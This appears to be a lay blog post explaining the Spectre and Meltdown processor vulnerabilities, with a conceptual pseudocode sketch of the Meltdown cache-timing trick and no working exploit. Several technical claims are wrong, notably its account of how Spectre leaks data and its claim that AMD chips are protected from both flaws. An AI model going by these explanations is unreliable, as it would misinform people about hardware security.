.png)
SPECTRE AND MELTDOWN
What Is Spectre and Meltdown?
Spectre and Meltdown are two vulnerabilities that affects
nearly every computer chip which manufactured in the last 20 years of time. On
1st of June 2017 researchers working on Google Project Zero has
discovers these 2 major security flaws in modern processers. This came to topic
early this year at the Consumer Electronics Show 2018. A technique called Speculative
Execution which is widely used to boost the performance of modern processors
has caused these bugs.
What Is Speculative Execution?
This
is a technique which is widely used in modern processors to enhance their
performance in a massive level. What this does is, it predicts what will user
do next in the future and processes
these data. And these processed data will be kept in the CPU s cache for quick
access. If user execute the predicted instruction then CPU can respond fast
because data is already processed. Due to this technique, work is done before
it is known whether it is actually needed. This is the vulnerability that
Spectre and Meltdown tries to exploit.
Meltdown
Operating system stores sensitive information in a protected
area on the main memory. So, the CPU makes sure that the no program allowed to
read data from this area of the memory, except the operating system. But when
speculative takes place these laws does not enforces, and that leaves a space
for exploits.
Let’s take an example:
Now
imagine user’s login details are stored in the protected memory. There is a
program which requests that memory from CPU, but CPU won’t allow this operation
to happen. But here program tricks the CPU in another way lets take a piece of
code
If (user’s password’s first letter==’C’)
{
Load something, imagine it is pic.jpg;
}
Now processor would check the condition but it won’t allow
the program to run it. but speculative execution will check the condition and
do the rest of the code. Because it does not check whether program is allowed
or not it processes the next instruction and stores in the cache. But it won’t
let the program to know it because program cannot access the protected memory.
Now the program does the tricky part it tries to load the same file pic.jpg and
measures the time that it takes if the time is significantly low then that
means that pic.jpg is already loaded and it is in cache. That means the
condition of the above code is true. Otherwise speculative execution won’t load
the pic.jpg to the cache. Like that a hacker can steal sensitive information
from our PC. This is called as Meltdown.
Spectre
This is also a vulnerability which can be exploited to get
any data not only from protected memory but also in program’s memory space.
There is a technique called branch prediction in CPU which is used to
understand patterns in executing instructions.
Let’s take an example:
Imaging that most of the time you go to My Computer you open
disk D. Now CPU tracks this activity and next time you go to My Computer CPU
will process the data in disk D and stores them in the cache to provide fast
access to disk D when you open it. Now at this time you don’t go to disk D
therefore those processed data are thrown to an unprotected cache. So, a hacker
can access this data by using a side channel attack. This Spectre vulnerability
is hard to overcome this is a hardware level vulnerability to overcome this
whole architecture should have to be changed.
Stay Safe
Main reason for these vulnerabilities is Speculative
Execution. But it boosts the CPU performance by a massive level. So, removing
speculative execution is not a best action. But now most of hardware
manufactures and Operating System Developers have released security updates and
patches for these issues. But we cannot tell how effective those software solutions
for these hardware level problems. But something is better than nothing. In the
future hardware manufactures will design their micro processors to minimize
these threats. AMD are already protected from these threats. Because they do
not let speculative execution with protected memory.
No comments:
Post a Comment